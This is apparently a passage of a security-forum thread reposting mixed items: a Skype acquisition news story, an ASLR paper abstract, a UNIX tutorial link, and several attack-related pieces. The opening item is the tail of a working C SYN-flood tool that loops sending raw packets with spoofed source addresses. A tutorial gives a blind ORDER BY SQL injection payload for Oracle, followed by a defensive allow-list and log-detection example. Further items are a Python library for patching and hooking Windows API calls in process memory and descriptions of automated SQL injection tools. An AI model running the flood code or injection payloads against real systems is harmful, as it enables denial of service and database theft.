           memmove(packet, &ip, IPHDR_LEN);
           memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);

           sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
           if (sd == -1) {
               printf("Failed to create socket. Error code: %d\n", errno);
               exit(1);
           }
           if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
               printf("Failed to set socket options. Error code: %d\n", errno);
               exit(1);
           }

           sin.sin_family = AF_INET;
           sin.sin_port = htons(tcp.dport);
           memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr));

           while (1) {
               if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
                   printf("Failed to send SYN packet(s). Error code: %d\n", errno);
                   exit(1);
               } else {
                   printf("Sent SYN packet with spoofed ip: %s\n", rip);
               }
               ip.id = htons(rand16());
               ip.src = (uint)inet_addr(randip(rip));
               ip.chksum = 0;
               ip.chksum = csum((short*)&ip, IPHDR_LEN);
               tph.src = ip.src;
               tcp.seq = htonl(rand32());
               tcp.chksum = 0;
               memmove(packet, &tph, TCPPH_LEN);
               memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
               tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
               memmove(packet, &ip, IPHDR_LEN);
               memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
           }
       }

       ushort csum(short* data, int len) {
           int sum = 0;
           for (; len > 1; len -= 2) sum += *data++;
           if (len == 1) sum += *(uchar*)data;
           while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
           return ~sum;
       }

       /* The best I can do for generating a random ipv4 address */
       char* randip(char* dst) {
           dst[0] = 0;
           int i, j, k;
           srandom(time(0));
           srand(random());
           srandom(rand());
           j = rand() + random();
           for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) {
               srand((int)dst + i + k);
               srand(j + dst[i+k] + (int)&i + rand());
               j = rand() % 255;
               sprintf(dst + i, "%d.", j);
           }
           dst[i-1] = 0;
           return dst;
       }

       ushort rand16() {
           srandom(time(0));
           srand(random());
           srandom(rand());
           return (random() + rand() + time(0)) % 65535;
       }

       uint rand32() {
           srandom(time(0));
           srand(random());
           srandom(rand());
           return (random() + rand() & time(0));
       }

     tcpip.h

       #include <unistd.h>
       #include <netinet/in.h>
       #include <sys/socket.h>
       #include <arpa/inet.h>
       #include <netdb.h>

       typedef unsigned char uchar;
       typedef unsigned short ushort;
       typedef unsigned int uint;

       /* Internet Datagram Header */
       #define IPHDR_LEN 20
       struct iphdr {
           uchar ipv:4;    /* Internet Protocol Version */
           uchar ihl:4;    /* Total length (in DWORDs) */
           uchar tos;      /* Type of Service */
           ushort len;     /* Total length */
           ushort id;      /* Identification number */
           ushort frag;    /* Fragment offset and flags */
           uchar ttl;      /* Time to live */
           uchar proto;    /* Protocol type */
           ushort chksum;  /* Checksum */
           uint src;       /* Source IP Address */
           uint dst;       /* Destination IP Address */
       };

       /* TCP Header */
       #define TCPHDR_LEN 20
       struct tcphdr {
           ushort sport;   /* Source Port */
           ushort dport;   /* Destination Port */
           uint seq;       /* Sequence number */
           uint ack;       /* Acknowledgement number */
           uchar reserved:4;
           uchar offset:4; /* Size of TCP Header in DWORDs */
           uchar flgs;     /* TCP Flags */
       #define TCP_FIN 0x01
       #define TCP_SYN 0x02
       #define TCP_RST 0x04
       #define TCP_PSH 0x08
       #define TCP_ACK 0x10
       #define TCP_URG 0x20
           ushort win;     /* Window. Size of data to accept */
           ushort chksum;  /* Checksum */
           ushort urgp;    /* idk */
       };

       /* TCP Psuedo-header */
       #define TCPPH_LEN 12
       struct tcpph {
           uint src;
           uint dst;
           uchar zero;
           uchar proto;
           ushort tcp_len;
       };

     Source: LeetCoders
  9. Exploiting SQL Injection in ORDER BY on Oracle/MySQL
submitted by alla on 10 May, 2011 - 15:10

Consider the following piece of code:

    $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on a MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here. I couldn't find any clues for Oracle though, so now that I have figured it out, here is how.

This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id. In this case it returns the following data:

    foo
    bar
    baz

We can try sorting by other columns and see if the data gets returned in a different order. Say, if we try vulnerable.php?sortcolumn=something, we get back:

    bar
    baz
    foo

Now all we need to do is to get the query to sort the data by a different column depending on the value of a given expression. In Oracle the following syntax works:

    ORDER BY (case when ((boolean_expression)) then id else something end)

If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this:

    vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end)

This will extract the most significant bit of the first character of the first row returned by the "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation.
MySQL:
http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/
http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
Source: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle
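The post above shows why a column name in ORDER BY cannot be fixed with a bind parameter. The following added example (written for this page, not code from the post or from gremwell) shows the defender's side: an allow-list that maps the user-supplied sort key to a fixed identifier, and a scanner that flags the CASE-WHEN probe shape from the post in request lines. The column names and sample requests are constructed.

```python
# Added example: hardening the ORDER BY sink from the post and spotting
# the CASE-WHEN oracle in request logs. Schema and requests are assumed.
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list: public sort key -> quoted SQL identifier (assumed schema).
# A column name cannot be bound as a parameter, so it must come from here.
SORTABLE_COLUMNS = {
    "id": '"ID"',
    "something": '"SOMETHING"',
}


class UnsafeSortColumn(ValueError):
    """Raised when the sort key is not one of the allow-listed columns."""


def build_query(sort_key: str, direction: str = "asc") -> str:
    """Build the statement from the post with a validated ORDER BY.

    Only a constant from SORTABLE_COLUMNS is interpolated; the id value
    stays a bound parameter ('?'). Anything else is rejected outright.
    """
    column = SORTABLE_COLUMNS.get(sort_key.strip().lower())
    if column is None:
        raise UnsafeSortColumn(f"sort column not allowed: {sort_key!r}")
    if direction.lower() not in ("asc", "desc"):
        raise UnsafeSortColumn(f"sort direction not allowed: {direction!r}")
    return (f"SELECT something FROM some_table WHERE id=? "
            f"ORDER BY {column} {direction.upper()}")


# Shape of the probe used in the post: a CASE expression that picks one of
# two columns. Keyword matching is enough for triage; the allow-list above
# is what actually blocks the injection.
CASE_PROBE = re.compile(r"\bcase\b.*\bwhen\b.*\bthen\b.*\belse\b.*\bend\b",
                        re.IGNORECASE | re.DOTALL)


def find_order_by_probes(request_lines, param="sortcolumn"):
    """Return (line_no, decoded_value) for requests whose sort parameter
    looks like a CASE-WHEN oracle, i.e. bit-by-bit blind extraction."""
    hits = []
    for n, line in enumerate(request_lines, 1):
        parts = line.split()
        path = parts[1] if len(parts) > 1 else line
        qs = parse_qs(urlsplit(path).query)  # decodes '+' and %XX
        for value in qs.get(param, []):
            if CASE_PROBE.search(value):
                hits.append((n, value))
    return hits


# Constructed request lines (method, path, status), not real traffic.
# The third one carries the exact payload quoted in the post.
SAMPLE_REQUESTS = [
    "GET /vulnerable.php?sortcolumn=id 200",
    "GET /vulnerable.php?sortcolumn=something 200",
    "GET /vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name"
    "+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end) 200",
]

if __name__ == "__main__":
    print(build_query("id"))
    for line_no, value in find_order_by_probes(SAMPLE_REQUESTS):
        print(f"line {line_no}: suspicious sortcolumn={value}")
```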
  10. Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. 
Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Sursa: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors
  11. API Hooking in Python Author: cadaver (cred) # patcher.py # handles patching and unpatching of process memory. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack, calcsize from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def OpenProcess (pid=GetCurrentProcessId()): """Opens a process by pid.""" DB ("[openProcess] pid:%s."%pid) phandle = windll.kernel32.OpenProcess (\ PROCESS_ALL_ACCESS, False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def readMemory (phandle, address, size): """readMemory (address, size, phandle):""" cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory (\ phandle, address, cbuffer, size, 0 ) assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1] return cbuffer.raw def writeMemory (phandle, address=None, data=None): """Writes data to memory and returns the address.""" assert data size = len (data) if isinstance (data, str) else sizeof (data) cdata = c_buffer (data) if isinstance (data, str) else byref (data) if not address: address = allocate (size, phandle) success = windll.kernel32.WriteProcessMemory (\ phandle, address, cdata, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] DB ("[write memory] :%s OK." 
% address) return address def allocate (size, phandle): """Allocates memory of size in phandle.""" address = windll.kernel32.VirtualAllocEx (\ phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1] DB ("[memory allocation] :%s" % address) return address def releaseMemory (address, size, phandle): """Releases memory by address.""" return windll.kernel32.VirtualFreeEx (\ phandle, address, size, MEM_RELEASE ) assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1] return cbuffer.raw def transport (data, phandle): size = len (data) memory = allocate (size, phandle) writeMemory (phandle, memory, data) return memory def get_patch (destination, params_size=0): """mov eax, destination call eax retn params_size """ if isinstance (destination, (int,long)): destination = pack ("i", destination) if isinstance (params_size, (int,long)): params_size = pack ("h", params_size) return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size) def get_cparams_size (cparams): if not cparams: return 0 s = '' for param in cparams: s += "size += sizeof (%s);\n" % param c_code = """ int getsize () { int size = 0; %s return size; }""" % s #DB (c_code) ccompiler = pytcc () ccompiler.compile (c_code) ccompiler.relocate () getsize = ccompiler.get_function ("getsize") size = getsize () # ccompiler.delete () return size def get_cparams_size_b (cparams): return sum (map (calcsize, [param._type_ for param in cparams])) def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): Searches the instructions inside an API for a good place to patch.""" # DEBUG if DEBUG == 2: bytes = PyGetString (apiaddress, needed_size * 2) dprint (apiaddress, bytes) # # # # aoffset = 0 found_space = 0 position = apiaddress while found_space < needed_size: bytes = PyGetString (position, 24) # DB ("found_space: %s. aoffset: %s. 
apiaddress: %s." % (found_space, aoffset, hex(position))) # if does_code_end_function (bytes): raise "Function end found before enough space was found!" offset, size, instruction, hexstr = Decode (position, bytes) [0] if "ret" in instruction.lower (): raise "Function end found before enough space was found!" if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): found_space += size else: found_space = 0 aoffset += size if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!" position += size return apiaddress + (aoffset - found_space) class patcher: source = None destination = None jmp_asm = None original_bytes = None params_size = 0 pid = None phandle = None duplicate_api = None original_api = None def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ): self.set_pid (pid) self.set_source (source) self.set_destination (destination) self.set_params_size (params_size) def set_pid (self, pid): self.close () self.phandle = OpenProcess (pid) self.pid = pid def set_source (self, source): self.source = source def set_destination (self, destination): self.destination = destination def set_params_size (self, size): self.params_size = size def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True): module = LoadLibrary (dllname) procedure = GetProcAddress (module, apiname) if free: FreeLibrary (module) assert procedure self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname)) self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size))) if DEBUG: DB ("found good spot to patch: %s %s. Offset from original api address: %s." \ %(self.source, hex (self.source), self.source - procedure)) def patch (self): assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!" assert not self.original_bytes, "Already patched!" 
self.jmp_asm = get_patch (self.destination, self.params_size) jmp_asm_size = len (self.jmp_asm) self.original_bytes = PyGetString (self.source, jmp_asm_size) assert self.original_bytes, "Failed to capture original_bytes." writeMemory (\ phandle=self.phandle, address=self.source, data=self.jmp_asm) msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \ % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes)) DB (msg) def unpatch (self): if not self.original_bytes: raise "Not patched!" assert all ((self.phandle, self.source, self.destination)), "Not initialized!" writeMemory (\ phandle=self.phandle, address=self.source, data=self.original_bytes ) self.original_bytes = None def close (self): if self.phandle: windll.kernel32.CloseHandle (self.phandle) self.phandle = None def release (self): if self.phandle and self.duplicate_api: releaseMemory (self.duplicate_api, 0, self.phandle) def call_original_api (self, *args, **kwargs): return self.original_api (*args, **kwargs) def call_duplicate_api (self, types, *args, **kwargs): return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs) def __del__ (self): try:self.unpatch () except:pass try:self.release () except:pass try:self.close () except:pass def dprint (a, c): """Pretty prints disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size print #cad # tramper.py # Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook. # TODO !Recalculate Relocated Relative jmp and call addresses. # public domain code. 
from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode from patcher import OpenProcess, readMemory, writeMemory, allocate, transport DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): Creates a duplicate API using the trampoline method and returns its address. """ if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes if not apiaddress: dll = LoadLibrary (dllname) apiaddress = GetProcAddress (dll, apiname) landing_offset = 0 hprocess = OpenProcess () original_bytes = PyGetString (apiaddress, 300) tramp_memory = allocate (len (original_bytes) + 50, hprocess) print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory)) instructions = Decode (apiaddress, original_bytes) sizes = iter ([X[1] for X in instructions]) while landing_offset < hook_size: landing_offset += sizes.next () landing_address = apiaddress + landing_offset DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset))) DB ("Landing address: %s %s" % (landing_address, hex (landing_address))) distance = landing_address - (tramp_memory +landing_offset) DB ("Distance: %s %s." % (distance, hex (distance))) tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction instructions = Decode (apiaddress, tramp_code) boffset = 0 for offset, size, instruction, hexstr in instructions: if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset) boffset += size # # TODO !Recalculate Relocated Relative jmp and call addresses. 
# jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump) tramp_code += jump_code # DEBUG DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code)))) DB ("Tramper api decode.") if DEBUG: dprint (apiaddress, tramp_code) # # # # writeMemory (hprocess, tramp_memory, tramp_code) CloseHandle (hprocess) return tramp_memory def dprint (a, c): """ pretty print disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size if __name__ == "__main__": # Test. lib = LoadLibrary ("kernel32") OpenProcessAddr = GetProcAddress (lib, "OpenProcess") FreeLibrary (lib) trampAddr = tramper (\ apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate. hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes) apiname=None, # (optional) dllname="kernel32") # (optional / defaults to kernel32) # Prototype the OpenProcess trampoline. duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr) pid = GetCurrentProcessId () print "Calling duplicate OpenProcess with pid: %s" % pid phandle = duplicate_OpenProcess (0x1f0fff, 0, pid) print "Return value: %s." %phandle if phandle: CloseHandle (phandle) #cad # hooker.py # deals with hooking of win32 APIs. # public domain code. 
from patcher import * from tramper import tramper from win32api import * from pytcc import pytcc def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ c_code =\ """ %s function (int caller, %s) { %s %s RET = DUPE ( %s ); %s return RET; }""" cargs = '' symbols = '' for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"): symbols += "%s, " % char cargs += "%s %s, " % (arg, char) symbols = symbols [:-2] cargs = cargs [:-2] c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic) ccompiler = pytcc () ccompiler.add_lib_proc ("msvcrt.dll", "memset") ccompiler.add_symbol ("DUPE", duplicate_api) ccompiler.compile (c_code) ccompiler.relocate () hook = ccompiler.get_symbol ("function") return (c_code, hook) def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """ pat = patcher () params_size = get_cparams_size (cparam_types) pat.set_params_size (params_size) pat.set_source_as_api (apiname, dllname) hook_size = len (get_patch (pat.destination, pat.params_size)) tramp = tramper (pat.source, hook_size) pat.duplicate_api = tramp hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype) pat.c_code = hook_ccode pat.set_destination (hooks) return pat if __name__ == '__main__': # Test. hook = hooker (\ # API to hook apiname="OpenProcess", # the DLL the API is in. (defaults to kernel32) dllname="kernel32", # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively. cparam_types=["int", "int", "int"], # (required) the API return type. restype="int", # (optional) this is the code in our hook wich is executed Before the real API. 
prelogic="if (C==1) {return 1111;}", # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET. postlogic="if (RET) {return 0;}" ) # hook API. # hook automatically unhooks itself and cleans up when it isnt refered to anymore. hook.patch () print "Calling hooked OpenProcess api with process id as 1." ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1) print "Return value: %s" % ret if ret == 1111: print "This test was sucesful." else: print "Return value is unexpected." # unhook API. # hook.unpatch () #cad Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110 Sursa: API Hooking in Python - rohitab.com - Forums
  12. No, it contained SQLite, so it was 99% a Stealer, which among other things also targeted Firefox. I didn't bother analyzing the file; I saw that and handed out the ban.
  13. Address Space Randomization for Mobile Devices
Hristo Bojinov, Stanford University; Dan Boneh, Stanford University; Rich Cannings, Google, Inc.; Iliyan Malchev, Google, Inc.

ABSTRACT
Address Space Layout Randomization (ASLR) is a defensive technique supported by many desktop and server operating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, limited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modifications and is suitable for mobile devices. We have implemented ASLR for the Android operating system and evaluated its effectiveness and performance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud, to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations.

Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf
  14. UNIX Tutorial for Beginners These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here. Typographical Conventions Introduction to The UNIX operating system Tutorial One Listing files and directories Making Directories Changing to a different Directory The directories . and .. Pathnames More about home directories and pathnames Tutorial Two Copying Files Moving Files Removing Files and directories Displaying the contents of a file on the screen Searching the contents of a file Tutorial Three Redirection Redirecting the Output Redirecting the Input Pipes Tutorial Four Wildcards Filename Conventions Getting Help Tutorial Five File system security (access rights) Changing access rights Processes and Jobs Listing suspended and background processes Killing a process Tutorial Six Other Useful UNIX commands Tutorial Seven Compiling UNIX software packages Download source code Extracting source code Configuring and creating the Makefile Building the package Running the software Stripping unnecessary code Tutorial Eight UNIX variables Environment variables Shell variables Using and setting variables UNIX Frequently Asked Questions (FAQs) These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell. History of UNIX UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation. This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK. Online: http://manuals.itc.virginia.edu/unixtut/index.html
  15. SQID SQL Injection Digger

About
SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations:
Look for SQL injections and common errors in web site URLs found by performing a google search.
Look for SQL injections and common errors in a given URL or a file with URLs.
Look for SQL injections and common errors in links from a web page.
Crawl a web site/web page and do the above.

Also supports
Load multiple triggers from file.
Load multiple signature databases from files.
HTTPS support.
HTTP proxy support with authentication.
Basic authentication.
Specify user agent.
Specify referer.
HTTP Cookies loading from command line or a file.

sqid is written in ruby. Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions.

Usage
Usage: sqid.rb [options]
options:
    -m, --mode MODE                  Operate in mode MODE. MODE is one of
        g,google                     Operate in google search mode.
        u,url                        Check this url or a file with urls.
        p,page                       Check single page.
        c,crawl                      Crawl website and check.
Google search mode options:
    -q, --query QUERY                QUERY to perforn google search for.
    -s, --start START                zero-based index of the first desired result, zero if not specified.
    -r, --results RESULTS            number of results desired, default is 20 if not specfied. rounded to tens.
URL check mode options:
    -u, --url URL                    check this URL. If URL is a file urls will be loaded from this file, specify each url on a new line.
Page check mode options:
    -p, --page PAGE                  Check this page.
Crawl mode options:
    -c, --crawl WEBSITE              Crawl website WEBSITE and check. specfify as http[s]://WESITE:[PORT], default PORT is 80
URL, Page and Crawl mode common options:
    -C, --cookie COOKIE              Cookie in the HTTP header specify as name=value,name=value. If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.
    -a, --accept-cookies             Accept cookies from the webite or page. Default is no.
    -R, --referer REFERER            Set referer in the HTTP header.
    -B, --auth CREDENTIALS           Use crendtials as basic auth for the website. specfify as user:password.
Common options:
    -o, --with-noquery               Match page content without query parameters. Default is false.
    -D, --db-files FILE,...,FILE     Use file(s) FILE,...,FILE as signature database.
    -t, --trigger TRIGGER            Use TRIGGER for detecting SQL injections/errors default is '. If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline. Lines starting with a # are ignored.
    -T, --time-out TIMEOUT           Timeout for response in seconds. Default is 10 seconds.
    -U, --user-agent USERAGENT       User Agent in the HTTP Header.
    -P, --proxy PROXY                User HTTP proxy PROXY for operations. specfify as proxy:port.
    -A, --proxy-auth CREDENTIALS     Use crendtials CRENDENTIALS for the proxy. specfify as user:password.
    -v, --verbose                    Run verbosely.
    -h, --help                       Show this message

Download: http://rubyforge.org/frs/?group_id=2617
  16. SQL Power Injector

Introduction
SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page. For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone would put in the parameter sent to the server. If the inline SQL injection aspect is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only is there a possibility to automate tedious and time-consuming queries, but you can also modify the query to get only what you want. It is obviously more useful in blind SQL injection, since the other ways to exploit a SQL injection vulnerability are more effusive and much faster when the results are displayed on the web page (union select in an HTML table and a generated 500 error, for instance). The automation can be realized in two ways: by comparing the expected result or by time delay. The first way generally compares against an error or the difference between a positive condition and a negative one, and the second way will turn out positive if the time delay sent to the server equals the one parameterized in the application. The main effort on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection, parameterized in a way that any related standard SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible.
Another important part of this application is its power to get all the parameters from the web page you need to test for SQL injection, either by the GET or POST method. This way someone won't need to use several applications or a proxy to intercept the data; all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current web page with its session context (parameters and cookies). I worked hard on the application's usability, but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood, it will be quite easy to use afterwards. In order to help a beginner understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, you will find some great tricks in the FAQ as well, and now with version 1.2 a help file (chm) containing a list of the most useful information for SQL injection. Also, I designed this application the way I was doing my own pen testing and how I was using SQL injection. It has been tested successfully many times on real-life web sites (legally of course) and as soon as I see something missing I add it. Now of course that it's officially available to the security community I will have to be more rigorous and wait to add them in a new version of the software. This process has already started and many more features will come with time. Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible for any misuse or damage caused by this application.

What It's Not
This application, however powerful, won't find SQL injection vulnerabilities for you, nor will it find the right syntax once one is found.
Its main strength is to provide a way to find them more easily and, once they are found, to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique. Moreover, I didn't intend to make it a database pumping application. There are plenty of good applications for that purpose. In any case much pumped data is not relevant, and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want. Lastly, if I added the feature (mini-browser) to have the results in HTML format, it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are really complex software, and it would be nearly impossible to implement all their features in my application. That's why you won't be able to use it as a conventional browser even though it has the same look and feel.

Features
Supported on Windows, Unix and Linux operating systems
SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant
SSL support
Load automatically the parameters from a form or an IFrame on a web page (GET or POST)
Detect and browse the framesets
Option that auto-detects the language of the web site
Detect and add cookies used during the Load Page process (Set-Cookie detection)
Find automatically the submit page(s) with its method (GET or POST) displayed in a different color
Can create/modify/delete loaded string and cookie parameters directly in the Datagrids
Single SQL injection
Blind SQL injection
Comparison of true and false response of the page or results in the cookie
Time delay
Response of the SQL injection in a customized browser
Can view the HTML source code of the returned page in HTML contextual colors and search in it
Fine tuning parameters and cookies injection
Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection
Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed
Multithreading (configurable up to 50)
Option to replace space by empty comments /**/ against IDS or filter detection
Automatically encode special characters before sending them
Automatically detect predefined SQL errors in the response page
Automatically detect a predefined word or sentence in the response page
Real time result
Save and load sessions in an XML file
Feature that automatically finds the differences between the response page of a positive answer and a negative one
Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you
Automatic replaying of a variable range with a predefined list from a text file
Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies)
Two integrated tools: Hex and Char encoder and MS SQL @options interpreter
Can edit the Referer
Can choose a User-Agent (or even create one in the User-Agent XML file)
Can configure the application with the settings window
Support configurable proxies

Differences with Other Tools
To be honest, I didn't study all the other tools' features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection. Some applications will find the SQL injection for you, which sometimes results in false positives. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need once the list of databases has been pumped. Or ask for a specific hard-coded piece of data, such as the current DB user. But none of them have the ability to specifically choose what you want, as far as I know.
